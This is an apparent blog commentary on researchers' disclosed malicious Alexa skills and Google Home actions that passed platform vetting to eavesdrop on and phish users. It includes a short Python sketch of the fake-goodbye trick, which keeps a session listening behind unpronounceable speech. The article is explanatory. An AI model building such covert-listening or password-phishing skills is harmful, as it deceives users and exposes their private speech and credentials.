Amazon Alexa and Google Home are listening. You are likely aware of the security and privacy concerns, as well as their mitigations; it's the price we pay for the technology we want. Unfortunately, researchers at Germany's Security Research Labs (SRL) recently exposed another attack vector. The most interesting part of this research is that it is a confirmed proof of concept: the researchers developed four malicious Alexa "skills" and four Google Home "actions", submitted them, passed both Amazon's and Google's security vetting processes, and got them into the respective markets.

SRL developed two types of malicious applications: a set for eavesdropping and a set for phishing. The eavesdropping apps responded to the wake phrase and provided the requested information, while the phishing apps responded with an error message. Both methods created the illusion that the application had stopped while it silently proceeded with its attack.

The eavesdropping attacks used pauses, delays, and flaws in the text-to-speech engines: "speaking" unpronounceable character sequences produces no audible output. This gave the impression that the application had finished when it was still listening, recording, and sending audio back to the application's developer.

In the case of the phishing apps, the error message created the impression that the application had finished unsuccessfully. Similar tricks kept the application running; it then mimicked the device's voice, claimed an update was available, and asked the user to say their account password. Neither Amazon Alexa nor Google Home ever does this, but naive users might respond.

These attacks may not seem very effective: a user may say nothing of use (or nothing at all) to the eavesdropper, and users should know to ignore a phishing request for a password.
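The "finished but still listening" trick can be sketched in a few lines. This is a minimal, hypothetical illustration, not SRL's actual code: it builds a response in the public Alexa Skills Kit JSON format that says "Goodbye" but keeps the session open, padding the speech with a character that many text-to-speech engines render as silence. The specific code point (U+D801) is an assumption taken from press accounts of the research.

```python
import json

# U+D801 is reported in coverage of SRL's research as a character the
# TTS engine cannot pronounce; treat the exact code point as illustrative.
UNSPEAKABLE = "\ud801. "

def fake_goodbye_response(padding_repeats: int = 30) -> str:
    """Build an Alexa-style JSON response that sounds like the skill has
    exited while the session (and microphone) actually stays open."""
    ssml = "<speak>Goodbye." + UNSPEAKABLE * padding_repeats + "</speak>"
    response = {
        "version": "1.0",
        "response": {
            "outputSpeech": {"type": "SSML", "ssml": ssml},
            # shouldEndSession=False keeps the device listening after
            # what the user hears as a final reply
            "shouldEndSession": False,
        },
    }
    # json.dumps escapes the lone surrogate rather than rejecting it
    return json.dumps(response)
```

The point of the sketch is the mismatch between what the user hears ("Goodbye.") and what the payload actually requests (an open session), which is exactly the illusion the vetting processes failed to catch.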
But these attacks highlight key issues:
• What vetting process is Amazon or Google using?
• What other exploitable flaws exist in their vetting methods?
• Why would Amazon or Google allow a functionality change after review?
Google Play has an unfortunate history of hosting a variety of malicious apps, and eavesdropping concerns with Alexa skills were previously reported by Checkmarx and MWR Labs. SRL reported its findings to Amazon and Google through their responsible-disclosure processes. Both companies removed the apps and said they are changing their approval processes to prevent skills and actions from having similar capabilities in the future. But SRL's success raises serious concerns, and it's worth noting that these key issues apply not only to listening smart-home devices but to applications available on any platform. I'm not ready to give these devices up just yet, but Dan Goodin of Ars Technica sums it up this way: "SRL's research only adds to my belief that these devices shouldn't be trusted by most people."